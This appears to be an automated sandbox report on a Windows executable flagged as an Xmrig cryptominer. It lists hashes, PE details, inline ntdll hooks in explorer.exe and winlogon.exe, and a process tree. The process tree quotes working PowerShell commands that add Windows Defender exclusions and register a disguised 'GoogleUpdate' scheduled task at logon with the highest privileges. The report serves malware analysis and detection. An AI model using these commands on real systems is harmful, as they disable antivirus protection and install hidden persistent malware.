Preview:	ElfChnk.........z...............z...............8....x=.....................................................................'..U................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......q........H......................................................................**.................}z.............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Security.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	75944
Entropy (8bit):	4.210986073784933
Encrypted:	false
SSDEEP:	384:R0FR+B62M7tYoqRMtsAOoqiMt52moqiMtA0FR+B62M7tYoqRMtsAOoqiMt52moqw:42au2a0OQyWdWwQdwHiEOud9
MD5:	B0F9E58CE4E4B68A12963992FF60D0C9
SHA1:	5946C14631B7F136DDEEA5A89FE75335BCAA578E
SHA-256:	87789E54378180CE41D56E2DCFD9EFF5E1FC4103443430D7948F529A810941EA
SHA-512:	EDEE9C393713B04BCCF76057E0EEC43450CECC80F00E998A5728CAD178CE370242B501AF936269097692F8EFE6E46659C63E2719C310D56ED9A655A850F39E00
Malicious:	false
Preview:	ElfChnk......................................$...(..........................................................................7..................Z...s...h...................=...................................................N...............................................w.......4.......................-...................................[...........).......M...R...:...........................&...3.......................................>.......................................................................**...........................\...&.......\......]J.!....?.......A..3...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....\...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

C:\Windows\System32\winevt\Logs\System.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	76864
Entropy (8bit):	4.392487614772485
Encrypted:	false
SSDEEP:	384:oFRPW/FRPWjV9kRVEadbuJ0f+1mLFXPhnXgnX3CLfLsLEEb1QBISLngCOTpq8N9E:eSi+thJSy/eOTPDwY3CA
MD5:	FCC6FBE00B865F3157ADABD0824CFD4F
SHA1:	BBE974AFFDCCD4FFC5F3533A6528965EE6D7844C
SHA-256:	5A4E2920C03B07665DF52544AA178338A4D5FA7A03C58856A4BE6ABF708FE207
SHA-512:	5509362FB5028E27A6FDEC1472F9D7D6583D7E022C96BBF5BB5DF539D6389A995D01EEC3F1872B8102E0328951AA4A067ED067AD33A7BF8FB447EB1BAE781FA4
Malicious:	false
Preview:	ElfChnk.................V.......[...................K.......................................................................A.......................s...h...............N...=...................................................N...............................................w.......0.......................E...................................W...........).......M...3...:...................................................&...........................................................................................**......V........................&............\|S...r..;.......A../...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....X...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	57824
Entropy (8bit):	3.8547158677905276
Encrypted:	false
SSDEEP:	1536:zQY4dEe8Z06/AuLiFyIGtfb2nuouSXAwat:t
MD5:	BBC825076B23B4936B0F5797766BDE1B
SHA1:	85BEEBB4A5622A0478BCE315FAE6E8E1CC51BA38
SHA-256:	7EBC5AC34E61309F70309C7AE4DEE2F45F81D4A70289F74019B30CF1A417D558
SHA-512:	89888B444D8A978230B5B3AAFB4BE5E6A95D9F545C5524C38FD7B73140A44B9D083363DE0FF6863574087842BAF60FF9E5AA0ABA7DB68D79E7D97037D66A5A92
Malicious:	false
Preview:	ElfChnk.................y...................8........".....................................................................................................................=..........................................................................................................................._...............8...........................f...................M...c...........................n...................................................................&...................................................**......y.........4.............m.&.........m..{T....f...........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.692419723657324
TrID:	Win64 Executable (generic) (12005/4) 74.95% Generic Win/DOS Executable (2004/3) 12.51% DOS Executable Generic (2002/1) 12.50% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:	h2qWqtD73F.exe
File size:	5'980'672 bytes
MD5:	d0c2dd0e059c5011ed2eee4c65122177
SHA1:	a992a12930f59a9bff9a49337c004fef02a9fa4e
SHA256:	9db1d611bba928f40d86374641783083cda4f613236f3ec21ce62bcdeee9a6e6
SHA512:	7b415d78ff03d7f700c58fbc14f98a426c968d47e8ef366ba845cff2148d646b996b0b94438d6152eeea801b3a8a8ec4806de73f5d8513943e6e1519a5c624a5
SSDEEP:	98304:J8uD4BG85s9oxVU3MNkQ5Tmzku2D5YOttCTt9EwB6TQP+zyLlvxInBwae5MKc:Jz4UMCWQku2VvIt2q6TVyLlJIBwaf
TLSH:	6056C0F077ED6AA0E07E9476CAE5B81304053E7DF334A6A9DC9BA9C522C47C98D5700E
File Content Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&.....>[................@..............................[......%\...`... ............................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x1400014b0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x66F2D90E [Tue Sep 24 15:21:50 2024 UTC]
TLS Callbacks:	0x4000f090, 0x1, 0x4000f060, 0x1
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f7505c167603909b7180406402fef19e

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [005AFD05h]
mov dword ptr [eax], 00000001h
call 00007FFB488410CFh
nop
nop
dec eax
add esp, 28h
ret
nop dword ptr [eax]
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [005AFCE5h]
mov dword ptr [eax], 00000000h
call 00007FFB488410AFh
nop
nop
dec eax
add esp, 28h
ret
nop dword ptr [eax]
dec eax
sub esp, 28h
call 00007FFB48858214h
dec eax
test eax, eax
sete al
movzx eax, al
neg eax
dec eax
add esp, 28h
ret
nop
nop
nop
nop
nop
nop
nop
dec eax
lea ecx, dword ptr [00000009h]
jmp 00007FFB488413E9h
nop dword ptr [eax+00h]
ret
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
dec eax
lea eax, dword ptr [005B4869h]
dec eax
lea edx, dword ptr [eax+21h]
mov byte ptr [eax], 00000000h
dec eax
add eax, 01h
dec eax
cmp eax, edx
jne 00007FFB48841406h
ret
dec eax
lea eax, dword ptr [005B4811h]
dec eax
lea edx, dword ptr [eax+18h]
mov word ptr [eax], 0000h
dec eax
add eax, 02h
dec eax
cmp eax, edx
jne 00007FFB48841404h
ret
dec eax
lea eax, dword ptr [005B47D7h]
dec eax
lea edx, dword ptr [eax+14h]
mov word ptr [eax], 0000h
dec eax
add eax, 02h
dec eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5b7000	0xa34	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5ba000	0x678	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x5b2000	0x1170	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5bb000	0x330	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x5b07c0	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x5b728c	0x250	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x194a0	0x19600	58cdd396d034b5e465bc759df59c7fe4	False	0.4725119304187192	data	6.169699076142243	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x1b000	0x592ce0	0x592e00	7dd1388e1f5e55284919058eb885f701	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x5ae000	0x3a30	0x3c00	3a4566c8a121a0796d34a26d4a86c695	False	0.35475260416666665	OpenPGP Secret Key	5.050046376357435	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata	0x5b2000	0x1170	0x1200	e6eb6fb37253a7247e369d69bfa5ca4a	False	0.4672309027777778	data	5.115355474204768	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata	0x5b4000	0xf08	0x1000	8af173377510fd9427c83121335321ec	False	0.241943359375	data	4.018304666666889	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x5b5000	0x1ca0	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x5b7000	0xa34	0xc00	bc194b5beaec5996a339d475fc5318c4	False	0.3030598958333333	data	3.813179986422126	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x5b8000	0x60	0x200	3ad6371bc0079a85d9633ae66c2d882d	False	0.068359375	data	0.28655982431271465	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x5b9000	0x10	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x5ba000	0x678	0x800	417d4c396816418dc586e13d4963eb76	False	0.36767578125	data	4.090889627138075	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x5bb000	0x330	0x400	eff4113c063707272b04f05956372ddd	False	0.572265625	data	4.781501833134078	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x5ba0a0	0x2b0	data	English	United States	0.4258720930232558
RT_MANIFEST	0x5ba350	0x325	XML 1.0 document, ASCII text	English	United States	0.506832298136646

Imports

DLL

Import

KERNEL32.dll

CloseHandle, CreateSemaphoreW, DeleteCriticalSection, EnterCriticalSection, GetCurrentThreadId, GetLastError, GetStartupInfoA, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, MultiByteToWideChar, RaiseException, ReleaseSemaphore, RtlCaptureContext, RtlLookupFunctionEntry, RtlUnwindEx, RtlVirtualUnwind, SetLastError, SetUnhandledExceptionFilter, Sleep, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, VirtualProtect, VirtualQuery, WaitForSingleObject, WideCharToMultiByte

msvcrt.dll

__C_specific_handler, ___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _commode, _errno, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, fputc, fputs, fputwc, free, fwprintf, fwrite, localeconv, malloc, memcpy, memset, realloc, signal, strcmp, strerror, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 8, 2024 00:24:46.792241096 CEST	1.1.1.1	192.168.2.11	0xe76	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Oct 8, 2024 00:24:46.792241096 CEST	1.1.1.1	192.168.2.11	0xe76	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
ZwEnumerateKey	INLINE	explorer.exe, winlogon.exe
NtQuerySystemInformation	INLINE	explorer.exe, winlogon.exe
ZwResumeThread	INLINE	explorer.exe, winlogon.exe
NtDeviceIoControlFile	INLINE	explorer.exe, winlogon.exe
ZwDeviceIoControlFile	INLINE	explorer.exe, winlogon.exe
NtEnumerateKey	INLINE	explorer.exe, winlogon.exe
NtQueryDirectoryFile	INLINE	explorer.exe, winlogon.exe
ZwEnumerateValueKey	INLINE	explorer.exe, winlogon.exe
ZwQuerySystemInformation	INLINE	explorer.exe, winlogon.exe
NtResumeThread	INLINE	explorer.exe, winlogon.exe
RtlGetNativeSystemInformation	INLINE	explorer.exe, winlogon.exe
NtQueryDirectoryFileEx	INLINE	explorer.exe, winlogon.exe
NtEnumerateValueKey	INLINE	explorer.exe, winlogon.exe
ZwQueryDirectoryFileEx	INLINE	explorer.exe, winlogon.exe
ZwQueryDirectoryFile	INLINE	explorer.exe, winlogon.exe

Processes

Process: explorer.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Process: winlogon.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Target ID:	0
Start time:	18:24:28
Start date:	07/10/2024
Path:	C:\Users\user\Desktop\h2qWqtD73F.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\h2qWqtD73F.exe"
Imagebase:	0x7ff752a40000
File size:	5'980'672 bytes
MD5 hash:	D0C2DD0E059C5011ED2EEE4C65122177
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	18:24:29
Start date:	07/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	18:24:29
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	18:24:32
Start date:	07/10/2024
Path:	C:\Windows\System32\dialer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dialer.exe
Imagebase:	0x7ff78a700000
File size:	39'936 bytes
MD5 hash:	B2626BDCF079C6516FC016AC5646DF93
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	18:24:32
Start date:	07/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	18:24:32
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	18:24:32
Start date:	07/10/2024
Path:	C:\Windows\System32\winlogon.exe
Wow64 process (32bit):	false
Commandline:	winlogon.exe
Imagebase:	0x7ff729c20000
File size:	906'240 bytes
MD5 hash:	F8B41A1B3E569E7E6F990567F21DCE97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	18:24:33
Start date:	07/10/2024
Path:	C:\Windows\System32\lsass.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\lsass.exe
Imagebase:	0x7ff6745e0000
File size:	59'456 bytes
MD5 hash:	A1CC00332BBF370654EE3DC8CDC8C95A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	18:24:34
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	18:24:34
Start date:	07/10/2024
Path:	C:\Windows\System32\dwm.exe
Wow64 process (32bit):	false
Commandline:	"dwm.exe"
Imagebase:	0x7ff613010000
File size:	94'720 bytes
MD5 hash:	5C27608411832C5B39BA04E33D53536C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	18:24:38
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	18:24:39
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	18:24:39
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	18:24:39
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	18:24:39
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000010.00000002.2675524616.0000020422C06000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000010.00000002.2676628688.0000020422C5F000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000010.00000002.2654430567.0000020422302000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	18:24:40
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	18:24:40
Start date:	07/10/2024
Path:	C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe
Imagebase:	0x7ff6dd480000
File size:	5'980'672 bytes
MD5 hash:	D0C2DD0E059C5011ED2EEE4C65122177
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 55%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	18:24:40
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	18:24:41
Start date:	07/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	18:24:41
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
